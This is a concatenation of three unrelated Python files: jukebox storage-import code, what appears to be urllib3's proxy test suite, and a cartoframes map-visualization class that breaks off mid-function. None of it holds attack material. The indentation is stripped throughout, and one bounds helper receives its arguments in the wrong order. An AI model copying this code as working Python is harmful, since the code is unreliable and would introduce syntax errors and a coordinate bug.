have_container = True
if not have_container:
print("error: unable to create container for playlists. unable to import")
return
for listing_entry in dir_listing:
full_path = os.path.join(self.playlist_import_dir, listing_entry)
# ignore it if it's not a file
if os.path.isfile(full_path):
object_name = listing_entry
file_read, file_contents, _ = self.read_file_contents(full_path)
if file_read and file_contents is not None:
if self.storage_system.put_object(self.playlist_container,
object_name,
file_contents):
print("put of playlist succeeded")
if not self.store_song_playlist(object_name, file_contents):
print("storing of playlist to db failed")
self.storage_system.delete_object(self.playlist_container,
object_name)
else:
print("storing of playlist succeeded")
file_import_count += 1
if file_import_count > 0:
print("%d playlists imported" % file_import_count)
# upload metadata DB file
self.upload_metadata_db()
else:
print("no files imported")
def show_playlists(self):
if self.jukebox_db is not None:
self.jukebox_db.show_playlists()
def show_playlist(self, playlist):
print("TODO: implement jukebox.py:show_playlist")
def play_playlist(self, playlist):
print("TODO: implement jukebox.py:play_playlist")
def delete_song(self, song_uid, upload_metadata=True):
is_deleted = False
if song_uid is not None and len(song_uid) > 0:
db_deleted = self.jukebox_db.delete_song(song_uid)
container = self.container_for_song(song_uid)
ss_deleted = False
if container is not None and len(container) > 0:
ss_deleted = self.storage_system.delete_object(container, song_uid)
if db_deleted and upload_metadata:
self.upload_metadata_db()
is_deleted = db_deleted or ss_deleted
return is_deleted
def delete_artist(self, artist):
is_deleted = False
if artist is not None and len(artist) > 0:
song_list = self.jukebox_db.retrieve_songs(artist)
if song_list is not None:
if len(song_list) == 0:
print("no songs in jukebox")
sys.exit(0)
else:
for song in song_list:
if not self.delete_song(song.fm.object_name, False):
print("error deleting song '%s'" % song.fm.object_name)
sys.exit(1)
self.upload_metadata_db()
is_deleted = True
else:
print("no songs in jukebox")
sys.exit(0)
return is_deleted
def delete_album(self, album):
#TODO: implement delete_album
return False
def delete_playlist(self, playlist_name):
is_deleted = False
object_name = self.jukebox_db.get_playlist(playlist_name)
if object_name is not None and len(object_name) > 0:
object_deleted = False
db_deleted = self.jukebox_db.delete_playlist(playlist_name)
if db_deleted:
print("container='%s', object='%s'" % (self.playlist_container, object_name))
object_deleted = self.storage_system.delete_object(self.playlist_container,
object_name)
if object_deleted:
is_deleted = True
else:
print("error: object delete failed")
else:
print("error: database delete failed")
if is_deleted:
self.upload_metadata_db()
else:
print("delete of playlist failed")
else:
print("invalid playlist name")
return is_deleted
def import_album_art(self):
if self.jukebox_db is not None and self.jukebox_db.is_open():
file_import_count = 0
dir_listing = os.listdir(self.album_art_import_dir)
if len(dir_listing) == 0:
print("no album art found")
return
if not self.storage_system.has_container(self.album_art_container):
have_container = self.storage_system.create_container(self.album_art_container)
else:
have_container = True
if not have_container:
print("error: unable to create container for album art. unable to import")
return
for listing_entry in dir_listing:
full_path = os.path.join(self.album_art_import_dir, listing_entry)
# ignore it if it's not a file
if os.path.isfile(full_path):
object_name = listing_entry
file_read, file_contents, _ = self.read_file_contents(full_path)
if file_read and file_contents is not None:
if self.storage_system.put_object(self.album_art_container,
object_name,
file_contents):
file_import_count += 1
if file_import_count > 0:
print("%d album art files imported" % file_import_count)
else:
print("no files imported")
| |
import os.path
import shutil
import socket
import ssl
import tempfile
from test import LONG_TIMEOUT, SHORT_TIMEOUT, onlySecureTransport, withPyOpenSSL
import pytest
import trustme
import urllib3.exceptions
from dummyserver.server import DEFAULT_CA, HAS_IPV6, get_unreachable_address
from dummyserver.testcase import HTTPDummyProxyTestCase, IPv6HTTPDummyProxyTestCase
from urllib3 import HTTPResponse
from urllib3._collections import HTTPHeaderDict
from urllib3.connection import VerifiedHTTPSConnection
from urllib3.connectionpool import connection_from_url
from urllib3.exceptions import (
ConnectTimeoutError,
MaxRetryError,
ProxyError,
ProxySchemeUnknown,
ProxySchemeUnsupported,
ReadTimeoutError,
SSLError,
)
from urllib3.poolmanager import ProxyManager, proxy_from_url
from urllib3.util.ssl_ import create_urllib3_context
from urllib3.util.timeout import Timeout
from .. import TARPIT_HOST, requires_network
# Retry failed tests
pytestmark = pytest.mark.flaky
class TestHTTPProxyManager(HTTPDummyProxyTestCase):
@classmethod
def setup_class(cls) -> None:
super().setup_class()
cls.http_url = f"http://{cls.http_host}:{int(cls.http_port)}"
cls.http_url_alt = f"http://{cls.http_host_alt}:{int(cls.http_port)}"
cls.https_url = f"https://{cls.https_host}:{int(cls.https_port)}"
cls.https_url_alt = f"https://{cls.https_host_alt}:{int(cls.https_port)}"
cls.proxy_url = f"http://{cls.proxy_host}:{int(cls.proxy_port)}"
cls.https_proxy_url = f"https://{cls.proxy_host}:{int(cls.https_proxy_port)}"
# Generate another CA to test verification failure
cls.certs_dir = tempfile.mkdtemp()
bad_ca = trustme.CA()
cls.bad_ca_path = os.path.join(cls.certs_dir, "ca_bad.pem")
bad_ca.cert_pem.write_to_path(cls.bad_ca_path)
@classmethod
def teardown_class(cls) -> None:
super().teardown_class()
shutil.rmtree(cls.certs_dir)
def test_basic_proxy(self) -> None:
with proxy_from_url(self.proxy_url, ca_certs=DEFAULT_CA) as http:
r = http.request("GET", f"{self.http_url}/")
assert r.status == 200
r = http.request("GET", f"{self.https_url}/")
assert r.status == 200
def test_https_proxy(self) -> None:
with proxy_from_url(self.https_proxy_url, ca_certs=DEFAULT_CA) as https:
r = https.request("GET", f"{self.https_url}/")
assert r.status == 200
r = https.request("GET", f"{self.http_url}/")
assert r.status == 200
def test_https_proxy_with_proxy_ssl_context(self) -> None:
proxy_ssl_context = create_urllib3_context()
proxy_ssl_context.load_verify_locations(DEFAULT_CA)
with proxy_from_url(
self.https_proxy_url,
proxy_ssl_context=proxy_ssl_context,
ca_certs=DEFAULT_CA,
) as https:
r = https.request("GET", f"{self.https_url}/")
assert r.status == 200
r = https.request("GET", f"{self.http_url}/")
assert r.status == 200
@withPyOpenSSL
def test_https_proxy_pyopenssl_not_supported(self) -> None:
with proxy_from_url(self.https_proxy_url, ca_certs=DEFAULT_CA) as https:
r = https.request("GET", f"{self.http_url}/")
assert r.status == 200
with pytest.raises(
ProxySchemeUnsupported, match="isn't available on non-native SSLContext"
):
https.request("GET", f"{self.https_url}/")
@onlySecureTransport()
def test_https_proxy_securetransport_not_supported(self) -> None:
with proxy_from_url(self.https_proxy_url, ca_certs=DEFAULT_CA) as https:
r = https.request("GET", f"{self.http_url}/")
assert r.status == 200
with pytest.raises(
ProxySchemeUnsupported, match="isn't available on non-native SSLContext"
):
https.request("GET", f"{self.https_url}/")
def test_https_proxy_forwarding_for_https(self) -> None:
with proxy_from_url(
self.https_proxy_url,
ca_certs=DEFAULT_CA,
use_forwarding_for_https=True,
) as https:
r = https.request("GET", f"{self.http_url}/")
assert r.status == 200
r = https.request("GET", f"{self.https_url}/")
assert r.status == 200
def test_nagle_proxy(self) -> None:
"""Test that proxy connections do not have TCP_NODELAY turned on"""
with ProxyManager(self.proxy_url) as http:
hc2 = http.connection_from_host(self.http_host, self.http_port)
conn = hc2._get_conn()
try:
hc2._make_request(conn, "GET", "/")
tcp_nodelay_setting = conn.sock.getsockopt(
socket.IPPROTO_TCP, socket.TCP_NODELAY
)
assert tcp_nodelay_setting == 0, (
"Expected TCP_NODELAY for proxies to be set "
"to zero, instead was %s" % tcp_nodelay_setting
)
finally:
conn.close()
@pytest.mark.parametrize("proxy_scheme", ["http", "https"])
@pytest.mark.parametrize("target_scheme", ["http", "https"])
def test_proxy_conn_fail_from_dns(
self, proxy_scheme: str, target_scheme: str
) -> None:
host, port = get_unreachable_address()
with proxy_from_url(
f"{proxy_scheme}://{host}:{port}/", retries=1, timeout=LONG_TIMEOUT
) as http:
if target_scheme == "https":
target_url = self.https_url
else:
target_url = self.http_url
with pytest.raises(MaxRetryError) as e:
http.request("GET", f"{target_url}/")
assert type(e.value.reason) == ProxyError
assert (
type(e.value.reason.original_error)
== urllib3.exceptions.NameResolutionError
)
def test_oldapi(self) -> None:
with ProxyManager(
connection_from_url(self.proxy_url), ca_certs=DEFAULT_CA # type: ignore[arg-type]
) as http:
r = http.request("GET", f"{self.http_url}/")
assert r.status == 200
r = http.request("GET", f"{self.https_url}/")
assert r.status == 200
def test_proxy_verified(self) -> None:
with proxy_from_url(
self.proxy_url, cert_reqs="REQUIRED", ca_certs=self.bad_ca_path
) as http:
https_pool = http._new_pool("https", self.https_host, self.https_port)
with pytest.raises(MaxRetryError) as e:
https_pool.request("GET", "/", retries=0)
assert isinstance(e.value.reason, SSLError)
assert (
"certificate verify failed" in str(e.value.reason)
# PyPy is more specific
or "self signed certificate in certificate chain" in str(e.value.reason)
), f"Expected 'certificate verify failed', instead got: {e.value.reason!r}"
http = proxy_from_url(
self.proxy_url, cert_reqs="REQUIRED", ca_certs=DEFAULT_CA
)
https_pool = http._new_pool("https", self.https_host, self.https_port)
conn = https_pool._new_conn()
assert conn.__class__ == VerifiedHTTPSConnection
https_pool.request("GET", "/") # Should succeed without exceptions.
http = proxy_from_url(
self.proxy_url, cert_reqs="REQUIRED", ca_certs=DEFAULT_CA
)
https_fail_pool = http._new_pool("https", "127.0.0.1", self.https_port)
with pytest.raises(
MaxRetryError, match="doesn't match|IP address mismatch"
) as e:
https_fail_pool.request("GET", "/", retries=0)
assert isinstance(e.value.reason, SSLError)
def test_redirect(self) -> None:
with proxy_from_url(self.proxy_url) as http:
r = http.request(
"GET",
f"{self.http_url}/redirect",
fields={"target": f"{self.http_url}/"},
redirect=False,
)
assert r.status == 303
r = http.request(
"GET",
f"{self.http_url}/redirect",
fields={"target": f"{self.http_url}/"},
)
assert r.status == 200
assert r.data == b"Dummy server!"
def test_cross_host_redirect(self) -> None:
with proxy_from_url(self.proxy_url) as http:
cross_host_location = f"{self.http_url_alt}/echo?a=b"
with pytest.raises(MaxRetryError):
http.request(
"GET",
f"{self.http_url}/redirect",
fields={"target": cross_host_location},
retries=0,
)
r = http.request(
"GET",
f"{self.http_url}/redirect",
fields={"target": f"{self.http_url_alt}/echo?a=b"},
retries=1,
)
assert isinstance(r, HTTPResponse)
assert r._pool is not None
assert r._pool.host != self.http_host_alt
def test_cross_protocol_redirect(self) -> None:
with proxy_from_url(self.proxy_url, ca_certs=DEFAULT_CA) as http:
cross_protocol_location = f"{self.https_url}/echo?a=b"
with pytest.raises(MaxRetryError):
http.request(
"GET",
f"{self.http_url}/redirect",
fields={"target": cross_protocol_location},
retries=0,
)
r = http.request(
"GET",
f"{self.http_url}/redirect",
fields={"target": f"{self.https_url}/echo?a=b"},
retries=1,
)
assert isinstance(r, HTTPResponse)
assert r._pool is not None
assert r._pool.host == self.https_host
def test_headers(self) -> None:
with proxy_from_url(
self.proxy_url,
headers={"Foo": "bar"},
proxy_headers={"Hickory": "dickory"},
ca_certs=DEFAULT_CA,
) as http:
r = http.request_encode_url("GET", f"{self.http_url}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") == "dickory"
assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"
r = http.request_encode_url("GET", f"{self.http_url_alt}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") == "dickory"
assert (
returned_headers.get("Host") == f"{self.http_host_alt}:{self.http_port}"
)
r = http.request_encode_url("GET", f"{self.https_url}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") is None
assert (
returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
)
r = http.request_encode_body("POST", f"{self.http_url}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") == "dickory"
assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"
r = http.request_encode_url(
"GET", f"{self.http_url}/headers", headers={"Baz": "quux"}
)
returned_headers = r.json()
assert returned_headers.get("Foo") is None
assert returned_headers.get("Baz") == "quux"
assert returned_headers.get("Hickory") == "dickory"
assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"
r = http.request_encode_url(
"GET", f"{self.https_url}/headers", headers={"Baz": "quux"}
)
returned_headers = r.json()
assert returned_headers.get("Foo") is None
assert returned_headers.get("Baz") == "quux"
assert returned_headers.get("Hickory") is None
assert (
returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
)
r = http.request_encode_body(
"GET", f"{self.http_url}/headers", headers={"Baz": "quux"}
)
returned_headers = r.json()
assert returned_headers.get("Foo") is None
assert returned_headers.get("Baz") == "quux"
assert returned_headers.get("Hickory") == "dickory"
assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"
r = http.request_encode_body(
"GET", f"{self.https_url}/headers", headers={"Baz": "quux"}
)
returned_headers = r.json()
assert returned_headers.get("Foo") is None
assert returned_headers.get("Baz") == "quux"
assert returned_headers.get("Hickory") is None
assert (
returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
)
def test_https_headers(self) -> None:
with proxy_from_url(
self.https_proxy_url,
headers={"Foo": "bar"},
proxy_headers={"Hickory": "dickory"},
ca_certs=DEFAULT_CA,
) as http:
r = http.request_encode_url("GET", f"{self.http_url}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") == "dickory"
assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"
r = http.request_encode_url("GET", f"{self.http_url_alt}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") == "dickory"
assert (
returned_headers.get("Host") == f"{self.http_host_alt}:{self.http_port}"
)
r = http.request_encode_body(
"GET", f"{self.https_url}/headers", headers={"Baz": "quux"}
)
returned_headers = r.json()
assert returned_headers.get("Foo") is None
assert returned_headers.get("Baz") == "quux"
assert returned_headers.get("Hickory") is None
assert (
returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
)
def test_https_headers_forwarding_for_https(self) -> None:
with proxy_from_url(
self.https_proxy_url,
headers={"Foo": "bar"},
proxy_headers={"Hickory": "dickory"},
ca_certs=DEFAULT_CA,
use_forwarding_for_https=True,
) as http:
r = http.request_encode_url("GET", f"{self.https_url}/headers")
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Hickory") == "dickory"
assert (
returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
)
def test_headerdict(self) -> None:
default_headers = HTTPHeaderDict(a="b")
proxy_headers = HTTPHeaderDict()
proxy_headers.add("foo", "bar")
with proxy_from_url(
self.proxy_url, headers=default_headers, proxy_headers=proxy_headers
) as http:
request_headers = HTTPHeaderDict(baz="quux")
r = http.request("GET", f"{self.http_url}/headers", headers=request_headers)
returned_headers = r.json()
assert returned_headers.get("Foo") == "bar"
assert returned_headers.get("Baz") == "quux"
def test_proxy_pooling(self) -> None:
with proxy_from_url(self.proxy_url, cert_reqs="NONE") as http:
for x in range(2):
http.urlopen("GET", self.http_url)
assert len(http.pools) == 1
for x in range(2):
http.urlopen("GET", self.http_url_alt)
assert len(http.pools) == 1
for x in range(2):
http.urlopen("GET", self.https_url)
assert len(http.pools) == 2
for x in range(2):
http.urlopen("GET", self.https_url_alt)
assert len(http.pools) == 3
def test_proxy_pooling_ext(self) -> None:
with proxy_from_url(self.proxy_url) as http:
hc1 = http.connection_from_url(self.http_url)
hc2 = http.connection_from_host(self.http_host, self.http_port)
hc3 = http.connection_from_url(self.http_url_alt)
hc4 = http.connection_from_host(self.http_host_alt, self.http_port)
assert hc1 == hc2
assert hc2 == hc3
assert hc3 == hc4
sc1 = http.connection_from_url(self.https_url)
sc2 = http.connection_from_host(
self.https_host, self.https_port, scheme="https"
)
sc3 = http.connection_from_url(self.https_url_alt)
sc4 = http.connection_from_host(
self.https_host_alt, self.https_port, scheme="https"
)
assert sc1 == sc2
assert sc2 != sc3
assert sc3 == sc4
@requires_network()
@pytest.mark.parametrize(
["proxy_scheme", "target_scheme", "use_forwarding_for_https"],
[
("http", "http", False),
("https", "http", False),
# 'use_forwarding_for_https' is only valid for HTTPS+HTTPS.
("https", "https", True),
],
)
def test_forwarding_proxy_request_timeout(
self, proxy_scheme: str, target_scheme: str, use_forwarding_for_https: bool
) -> None:
proxy_url = self.https_proxy_url if proxy_scheme == "https" else self.proxy_url
target_url = f"{target_scheme}://{TARPIT_HOST}"
with proxy_from_url(
proxy_url,
ca_certs=DEFAULT_CA,
use_forwarding_for_https=use_forwarding_for_https,
) as proxy:
with pytest.raises(MaxRetryError) as e:
timeout = Timeout(connect=LONG_TIMEOUT, read=SHORT_TIMEOUT)
proxy.request("GET", target_url, timeout=timeout)
# We sent the request to the proxy but didn't get any response
# so we're not sure if that's being caused by the proxy or the
# target so we put the blame on the target.
assert type(e.value.reason) == ReadTimeoutError
@requires_network()
@pytest.mark.parametrize(
["proxy_scheme", "target_scheme"], [("http", "https"), ("https", "https")]
)
def test_tunneling_proxy_request_timeout(
self, proxy_scheme: str, target_scheme: str
) -> None:
proxy_url = self.https_proxy_url if proxy_scheme == "https" else self.proxy_url
target_url = f"{target_scheme}://{TARPIT_HOST}"
with proxy_from_url(
proxy_url,
ca_certs=DEFAULT_CA,
) as proxy:
with pytest.raises(MaxRetryError) as e:
timeout = Timeout(connect=LONG_TIMEOUT, read=SHORT_TIMEOUT)
proxy.request("GET", target_url, timeout=timeout)
assert type(e.value.reason) == ReadTimeoutError
@requires_network()
@pytest.mark.parametrize(
["proxy_scheme", "target_scheme", "use_forwarding_for_https"],
[
("http", "http", False),
("https", "http", False),
# 'use_forwarding_for_https' is only valid for HTTPS+HTTPS.
("https", "https", True),
],
)
def test_forwarding_proxy_connect_timeout(
self, proxy_scheme: str, target_scheme: str, use_forwarding_for_https: bool
) -> None:
proxy_url = f"{proxy_scheme}://{TARPIT_HOST}"
target_url = self.https_url if target_scheme == "https" else self.http_url
with proxy_from_url(
proxy_url, ca_certs=DEFAULT_CA, timeout=SHORT_TIMEOUT
) as proxy:
with pytest.raises(MaxRetryError) as e:
proxy.request("GET", target_url)
assert type(e.value.reason) == ProxyError
assert type(e.value.reason.original_error) == ConnectTimeoutError
@requires_network()
@pytest.mark.parametrize(
["proxy_scheme", "target_scheme"], [("http", "https"), ("https", "https")]
)
def test_tunneling_proxy_connect_timeout(
self, proxy_scheme: str, target_scheme: str
) -> None:
proxy_url = f"{proxy_scheme}://{TARPIT_HOST}"
target_url = self.https_url if target_scheme == "https" else self.http_url
with proxy_from_url(
proxy_url, ca_certs=DEFAULT_CA, timeout=SHORT_TIMEOUT
) as proxy:
with pytest.raises(MaxRetryError) as e:
proxy.request("GET", target_url)
assert type(e.value.reason) == ProxyError
assert type(e.value.reason.original_error) == ConnectTimeoutError
@requires_network()
@pytest.mark.parametrize(
["target_scheme", "use_forwarding_for_https"],
[
("http", False),
("https", False),
("https", True),
],
)
def test_https_proxy_tls_error(
self, target_scheme: str, use_forwarding_for_https: str
) -> None:
target_url = self.https_url if target_scheme == "https" else self.http_url
proxy_ctx = ssl.create_default_context()
with proxy_from_url(self.https_proxy_url, proxy_ssl_context=proxy_ctx) as proxy:
with pytest.raises(MaxRetryError) as e:
proxy.request("GET", target_url)
assert type(e.value.reason) == ProxyError
assert type(e.value.reason.original_error) == SSLError
@requires_network()
@pytest.mark.parametrize(
["proxy_scheme", "use_forwarding_for_https"],
[
("http", False),
("https", False),
("https", True),
],
)
def test_proxy_https_target_tls_error(
self, proxy_scheme: str, use_forwarding_for_https: str
) -> None:
proxy_url = self.https_proxy_url if proxy_scheme == "https" else self.proxy_url
proxy_ctx = ssl.create_default_context()
proxy_ctx.load_verify_locations(DEFAULT_CA)
ctx = ssl.create_default_context()
with proxy_from_url(
proxy_url, proxy_ssl_context=proxy_ctx, ssl_context=ctx
) as proxy:
with pytest.raises(MaxRetryError) as e:
proxy.request("GET", self.https_url)
assert type(e.value.reason) == SSLError
def test_scheme_host_case_insensitive(self) -> None:
"""Assert that upper-case schemes and hosts are normalized."""
with proxy_from_url(self.proxy_url.upper(), ca_certs=DEFAULT_CA) as http:
r = http.request("GET", f"{self.http_url.upper()}/")
assert r.status == 200
r = http.request("GET", f"{self.https_url.upper()}/")
assert r.status == 200
@pytest.mark.parametrize(
"url, error_msg",
[
(
"127.0.0.1",
"Proxy URL had no scheme, should start with http:// or https://",
),
(
"localhost:8080",
"Proxy URL had no scheme, should start with http:// or https://",
),
(
"ftp://google.com",
"Proxy URL had unsupported scheme ftp, should use http:// or https://",
),
],
)
def test_invalid_schema(self, url: str, error_msg: str) -> None:
with pytest.raises(ProxySchemeUnknown, match=error_msg):
proxy_from_url(url)
@pytest.mark.skipif(not HAS_IPV6, reason="Only runs on IPv6 systems")
class TestIPv6HTTPProxyManager(IPv6HTTPDummyProxyTestCase):
@classmethod
def setup_class(cls) -> None:
HTTPDummyProxyTestCase.setup_class()
cls.http_url = f"http://{cls.http_host}:{int(cls.http_port)}"
cls.http_url_alt = f"http://{cls.http_host_alt}:{int(cls.http_port)}"
cls.https_url = f"https://{cls.https_host}:{int(cls.https_port)}"
cls.https_url_alt = f"https://{cls.https_host_alt}:{int(cls.https_port)}"
cls.proxy_url = f"http://[{cls.proxy_host}]:{int(cls.proxy_port)}"
def test_basic_ipv6_proxy(self) -> None:
with proxy_from_url(self.proxy_url, ca_certs=DEFAULT_CA) as http:
r = http.request("GET", f"{self.http_url}/")
assert r.status == 200
r = http.request("GET", f"{self.https_url}/")
assert r.status == 200
| |
import collections
import numpy as np
from warnings import warn
from . import constants
from .html import HTMLMap
from .basemaps import Basemaps
from .kuviz import KuvizPublisher
from ..utils.utils import get_center, get_credentials
from ..utils.metrics import send_metrics
WORLD_BOUNDS = [[-180, -90], [180, 90]]
class Map:
"""Map to display a data visualization. It must contain a one or multiple :py:class:`Map <cartoframes.viz.Layer>`
instances. It provides control of the basemap, bounds and properties of the visualization.
Args:
layers (list of :py:class:`Layer <cartoframes.viz.Layer>`): List of
layers. Zero or more of :py:class:`Layer <cartoframes.viz.Layer>`.
basemap (str, optional):
- if a `str`, name of a CARTO vector basemap. One of `positron`,
`voyager`, or `darkmatter` from the :obj:`BaseMaps` class, or a
hex, rgb or named color value.
- if a `dict`, Mapbox or other style as the value of the `style` key.
If a Mapbox style, the access token is the value of the `token` key.
bounds (dict or list, optional): a dict with `west`, `south`, `east`, `north`
keys, or an array of floats in the following structure: [[west,
south], [east, north]]. If not provided the bounds will be automatically
calculated to fit all features.
size (tuple, optional): a (width, height) pair for the size of the map.
Default is (1024, 632).
viewport (dict, optional): Properties for display of the map viewport.
Keys can be `bearing` or `pitch`.
show_info (bool, optional): Whether to display center and zoom information in the
map or not. It is False by default.
is_static (bool, optional): Default False. If True, instead of showing and interactive
map, a png image will be displayed. Warning: UI components are not properly rendered in
the static view, we recommend to remove legends and widgets before rendering a static map.
theme (string, optional): Use a different UI theme (legends, widgets, popups). Available
themes are `dark` and `ligth`. By default, it is `light` for `Positron` and `Voyager`
basemaps and `dark` for `DarkMatter` basemap.
title (string, optional): Title to label the map. and will be displayed in the
default legend.
description (string, optional): Text that describes the map and will be displayed in the
default legend after the title.
Raises:
ValueError: if input parameters are not valid.
Examples:
Basic usage.
>>> Map(Layer('table in your account'))
Display more than one layer on a map.
>>> Map(layers=[
... Layer('table1'),
... Layer('table2')
>>> ])
Change the CARTO basemap style.
>>> Map(Layer('table in your account'), basemap=basemaps.darkmatter)
Choose a custom basemap style. Here we use the Mapbox streets style,
which requires an access token.
>>> basemap = {
... 'style': 'mapbox://styles/mapbox/streets-v9',
... 'token': 'your Mapbox token'
>>> }
>>> Map(Layer('table in your account'), basemap=basemap)
Remove basemap and show a custom color.
>>> Map(Layer('table in your account'), basemap='yellow') # None, False, 'white', 'rgb(255, 255, 0)'
Set custom bounds.
>>> bounds = {
... 'west': -10,
... 'east': 10,
... 'north': -10,
... 'south': 10
>>> } # or bounds = [[-10, 10], [10, -10]]
>>> Map(Layer('table in your account'), bounds=bounds)
Show the map center and zoom value on the map (lower left-hand corner).
>>> Map(Layer('table in your account'), show_info=True)
"""
def __init__(self,
layers=None,
basemap=Basemaps.positron,
bounds=None,
size=None,
viewport=None,
show_info=None,
theme=None,
title=None,
description=None,
is_static=None,
layer_selector=False,
**kwargs):
self.layer_selector = layer_selector
self.basemap = basemap
self.size = size
self.viewport = viewport
self.title = title
self.description = description
self.show_info = show_info
self.is_static = is_static
self.layers = _init_layers(layers, self)
self.bounds = _get_bounds(bounds, self.layers)
self.theme = _get_theme(theme, basemap)
self.token = get_token(basemap)
self.basecolor = get_basecolor(basemap)
self._carto_vl_path = kwargs.get('_carto_vl_path', None)
self._airship_path = kwargs.get('_airship_path', None)
self._publisher = None
self._kuviz = None
self.camera = None
if viewport is not None:
self.camera = {
'center': get_center(viewport),
'zoom': viewport.get('zoom'),
'bearing': viewport.get('bearing'),
'pitch': viewport.get('pitch')
}
@send_metrics('map_created')
def _repr_html_(self):
self._html_map = HTMLMap()
self._html_map.set_content(
layers=_get_layer_defs(self.layers),
bounds=self.bounds,
size=self.size,
camera=self.camera,
basemap=self.basemap,
show_info=self.show_info,
theme=self.theme,
title=self.title,
description=self.description,
is_static=self.is_static,
layer_selector=self.layer_selector,
_carto_vl_path=self._carto_vl_path,
_airship_path=self._airship_path)
return self._html_map.html
def get_content(self):
layer_defs = _get_layer_defs(self.layers)
has_legends = any(layer['legends'] for layer in layer_defs)
has_widgets = any(len(layer['widgets']) != 0 for layer in layer_defs)
return {
'layers': layer_defs,
'bounds': self.bounds,
'size': self.size,
'viewport': self.viewport,
'camera': self.camera,
'basemap': self.basemap,
'basecolor': self.basecolor,
'token': self.token,
'show_info': self.show_info,
'has_legends': has_legends,
'has_widgets': has_widgets,
'theme': self.theme,
'title': self.title,
'description': self.description,
'is_static': self.is_static,
'layer_selector': self.layer_selector,
'_carto_vl_path': self._carto_vl_path,
'_airship_path': self._airship_path
}
@send_metrics('map_published')
def publish(self, name, password, credentials=None, if_exists='fail', maps_api_key=None):
"""Publish the map visualization as a CARTO custom visualization.
Args:
name (str): The visualization name on CARTO.
password (str): By setting it, your visualization will be protected by
password. When someone tries to show the visualization, the password
will be requested. To disable password you must set it to None.
credentials (:py:class:`Credentials <cartoframes.auth.Credentials>`, optional):
A Credentials instance. If not provided, the credentials will be automatically
obtained from the default credentials if available. It is used to create the
publication and also to save local data (if exists) into your CARTO account.
if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with
the same name already exists in your account. Default is 'fail'.
maps_api_key (str, optional): The Maps API key used for private datasets.
Example:
Publishing the map visualization.
>>> tmap = Map(Layer('tablename'))
>>> tmap.publish('Custom Map Title', password=None)
"""
_credentials = get_credentials(credentials)
self._publisher = _get_publisher(_credentials)
self._publisher.set_layers(self.layers, maps_api_key)
html = self._get_publication_html(name)
return self._publisher.publish(html, name, password, if_exists)
def update_publication(self, name, password, if_exists='fail'):
"""Update the published map visualization.
Args:
name (str): The visualization name on CARTO.
password (str): setting it your visualization will be protected by
password and using `None` the visualization will be public.
if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with the same name already
exists in your account. Default is 'fail'.
Raises:
PublishError: if the map has not been published yet.
"""
html = self._get_publication_html(name)
return self._publisher.update(html, name, password, if_exists)
def _get_publication_html(self, name):
html_map = HTMLMap('templates/viz/main.html.j2')
html_map.set_content(
layers=_get_layer_defs(self._publisher.get_layers()),
bounds=self.bounds,
size=None,
camera=self.camera,
basemap=self.basemap,
show_info=False,
theme=self.theme,
title=name,
description=self.description,
is_static=self.is_static,
is_embed=True,
layer_selector=self.layer_selector,
_carto_vl_path=self._carto_vl_path,
_airship_path=self._airship_path)
return html_map.html
def _get_publisher(credentials):
return KuvizPublisher(credentials)
def _get_bounds(bounds, layers):
if bounds:
return _format_bounds(bounds)
else:
return _compute_bounds(layers)
def _init_layers(layers, parent_map):
if layers is None:
return []
if not isinstance(layers, collections.abc.Iterable):
layers.reset_ui(parent_map)
return [layers]
else:
for layer in layers:
layer.reset_ui(parent_map)
return layers
def _get_layer_defs(layers):
if layers is None:
return None
return list(map(_get_layer_def, layers))
def _get_layer_def(layer):
return layer.get_layer_def()
def _format_bounds(bounds):
if bounds is None:
return WORLD_BOUNDS
if isinstance(bounds, list):
return _format_list_bounds(bounds)
elif isinstance(bounds, dict):
return _format_dict_bounds(bounds)
else:
raise ValueError('Bounds must be a list or a dict')
def _format_list_bounds(bounds):
if not (len(bounds) == 2 and len(bounds[0]) == 2 and len(bounds[1]) == 2):
raise ValueError('Bounds list must have exactly four values in the '
'order: [[west, south], [east, north]]')
return _clamp_and_format_bounds(
bounds[0][0],
bounds[0][1],
bounds[1][0],
bounds[1][1])
def _format_dict_bounds(bounds):
if 'west' not in bounds or 'south' not in bounds or \
'east' not in bounds or 'north' not in bounds:
raise ValueError('Bounds must have "west", "south", "east" and '
'"north" properties')
return _clamp_and_format_bounds(
bounds.get('west'),
bounds.get('east'),
bounds.get('south'),
bounds.get('north'))
def _clamp_and_format_bounds(west, south, east, north):
west = _clamp(west, -180, 180)
east = _clamp(east, -180, 180)
south = _clamp(south, -90, 90)
north = _clamp(north, -90, 90)
return [[west, south], [east, north]]
def _clamp(value, minimum, maximum):
return _conv2nan(max(minimum, min(value, maximum)))
def _conv2nan(val):
"""convert Nones to np.nans"""
return np.nan if val is None else val
def _compute_bounds(layers):
init_bounds = None
if layers is not None and len(layers) > 0:
init_bounds = layers[0].bounds
bounds = _format_bounds(init_bounds)
for layer in layers[1:]:
layer_bounds = _format_bounds(layer.bounds)
if layer_bounds[0][0] < bounds[0][0]:
bounds[0][0] = layer_bounds[0][0]
if layer_bounds[0][1] < bounds[0][1]:
bounds[0][1] = layer_bounds[0][1]
if layer_bounds[1][0] > bounds[1][0]:
bounds[1][0] = layer_bounds[1][0]
if layer_bounds[1][1] > bounds[1][1]:
bounds[1][1] = layer_bounds[1][1]
return bounds
def _get_theme(theme, basemap):
if theme and theme not in constants.THEMES:
raise ValueError(
